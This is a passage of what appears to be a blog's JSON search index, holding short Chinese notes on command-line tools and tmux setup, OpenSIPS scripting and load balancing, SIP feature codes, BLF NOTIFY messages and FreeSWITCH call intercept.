Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.","title":"黑客帝国终端字符瀑布"},{"content":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","permalink":"https://wdd.js.org/posts/2021/03/dtas0p/","summary":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","title":"命令行笔记本 nb 记笔记何须离开终端?"},{"content":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;. Completed 1 task. 
# 任务完成后 task ls将不会显示已经完成的任务 ➜ ~ task ls No matches. # 可以使用task all 查看所有的todolist ➜ ~ task all ID St UUID A Age Done Project Due Description - C 341a0f48 2min 55s 2021-03-25 分机注册测试 燃烧图 # 按天的燃烧图 task burndown.daily # 按月的燃烧图 task burndown.monthly # 按周的燃烧图 task burndown.weekly 日历 task calendar 更多介绍 更多好玩的东西,可以去看看官方的使用说明文档 https://taskwarrior.org/docs/\n参考 https://taskwarrior.org/ 更多命令 https://taskwarrior.org/docs/commands/ ","permalink":"https://wdd.js.org/posts/2021/03/yyz3ca/","summary":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;.","title":"Taskwarrior 命令行下的专业TodoList神器"},{"content":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image. Global/session proxy. 
Quick commands Sync bookmarks/themes/quick commands to github/gitee secret gist Serial Port support(removed after version 1.10.14) Quick input to one or all terminal Command line usage: check wiki ","permalink":"https://wdd.js.org/posts/2021/03/tigv1h/","summary":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image.","title":"electerm 免费开源跨平台且功能强大的ssh工具"},{"content":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","permalink":"https://wdd.js.org/posts/2021/03/ibv4tb/","summary":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","title":"mac升级后命令行报错 xcrun: error: invalid active developer path"},{"content":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 除了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。\nhttps://www.opensips.org/Documentation/Script-Statements-2-4\n","permalink":"https://wdd.js.org/opensips/ch5/statement/","summary":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! 
**逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 除了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。","title":"常用语句"},{"content":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不再执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","permalink":"https://wdd.js.org/opensips/ch5/return/","summary":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不再执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... 
} ","title":"使用return语句减少逻辑嵌套"},{"content":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。\n","permalink":"https://wdd.js.org/opensips/ch5/core-var/","summary":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。","title":"核心变量说明"},{"content":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。\n","permalink":"https://wdd.js.org/posts/2021/03/rggbsl/","summary":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。","title":"网页分享到微信添加缩略图"},{"content":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","permalink":"https://wdd.js.org/network/pz06t2/","summary":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","title":"websocket tcp keepalive 机制调研"},{"content":"功能描述 
用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没办法用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","permalink":"https://wdd.js.org/opensips/ch9/feature-code/","summary":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没办法用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","title":"SIP feature codes SIP功能码"},{"content":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc 
[03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.cc intercept(6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1)\n常见的使用场景:\n某个电话正在振铃,但是没人接。如果我的话机通过BLF监控了这个分机,就可以通过按键来用我自己的话机代接正在振铃的话机。 参考 https://www.yuque.com/wangdd/fyikfz/lawr6v https://www.yuque.com/wangdd/fyikfz/lawr6v ","permalink":"https://wdd.js.org/freeswitch/intercept/","summary":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] 
sofia/external/8004@wdd.","title":"FS intercept拦截"},{"content":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","permalink":"https://wdd.js.org/posts/2021/03/mcbqod/","summary":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","title":"RFC阅读神器 rfcreader"},{"content":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","permalink":"https://wdd.js.org/posts/2021/03/yroxga/","summary":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 
微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","title":"oh my tmux tmux的高级定制"},{"content":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往是例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有在打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: 
\u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 466 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=108 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@ d.cc\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt; \u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt; \u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt; \u0026lt;remote\u0026gt; \u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/remote\u0026gt; \u0026lt;local\u0026gt; 
\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/local\u0026gt; \u0026lt;/dialog\u0026gt; \u0026lt;/dialog-info\u0026gt; 请求体的格式说明参见:https://tools.ietf.org/html/rfc4235#section-4\n挂断Body \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:8001@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;45f1115c-fc32-1239-7198-b827 6c4366\u0026#34; call-id=\u0026#34;45f1115c-fc32-1239-7198-b827eb6c4366\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;terminated\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:0000000000@192.168.2.53\u0026lt;/identity\u0026gt;\u0026lt; rget uri=\u0026#34;sip:0000000000@192.168.2.53\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; 参考 https://www.opensips.org/Documentation/Tutorials-Presence-PuaDialoinfoConfig https://www.yuque.com/wangdd/fyikfz/qs2vqx https://tools.ietf.org/html/rfc4235 ","permalink":"https://wdd.js.org/opensips/ch9/blf-note/","summary":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往是例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有在打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 
1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.","title":"BLF功能笔记"},{"content":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations. 
To be more precise, when routing, OpenSIPS will consider the less loaded destination not the destination with the smallest number of ongoing calls, but the destination with the largest available slot.\nAlso, the \u0026ldquo;load-balancing\u0026rdquo; (LB) module is able to receive feedback from the destinations (if they are capable of). This mechanism is used for notifying OpenSIPS when the maximum capacity of a destination changed (like a GW with more or less E1 cards).\nThe \u0026ldquo;load-balancing\u0026rdquo; functionality comes to enhance the \u0026ldquo;dispatcher\u0026rdquo; one. The difference comes in having or not load information about the destinations where you are routing to:\nDispatcher has no load information - it just blindly forwards calls to the destinations based on a probabilistic dispersion logic. It gets no feedback about the load of the destination (like how many calls that were sent actually were established or how many are still going). Load-balancer is load driven - LB routing logic is based primarily on the load information. The LB module is using the DIALOG module in order to keep track of the load (ongoing calls). 2. Load Balancing - how it works When looking at the LB implementation in OpenSIPS, we have 3 aspects:\n2.1 Destination set A destination is defined by its address (a SIP URI) and its description as capacity.\nFrom the LB module perspective, the destinations are not homogeneous - they are not alike; and not only from capacity point of view, but also from what kind of services/resources they offer. For example, you may have a set of Yate/Asterisk boxes for media-related services - some of them are doing transcoding, other voicemail or conference, other simple announcement, other PSTN termination. But you may have mixed boxes - one box may do PSTN and voicemail at the same time. 
So each destination from the set may offer a different set of services/resources.\nSo, for each destination, the LB module defines the offered resources, and for each resource, it defines the capacity / maximum load as number of concurrent calls the destination can handle for that resource.\nExample: 4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN id group_id dst_uri resources 1 1 sip:yate1.mycluster.net transc=30; pstn=32 2 1 sip:yate2.mycluster.net vm=100; transc=10 3 1 sip:yate3.mycluster.net vm=50; conf=300 4 1 sip:yate4.mycluster.net vm=10;conf=10;transc=10;pstn=32 For runtime, the LB module provides MI commands for:\nreloading the definition of destination sets changing the capacity for a resource for a destination 2.2 Invoking Load-balancing Using the LB functionality is very simple - you just have to pass to the LB module what kind of resources the call requires.\nThe resource detection is done in the OpenSIPS routing script, based on whatever information is 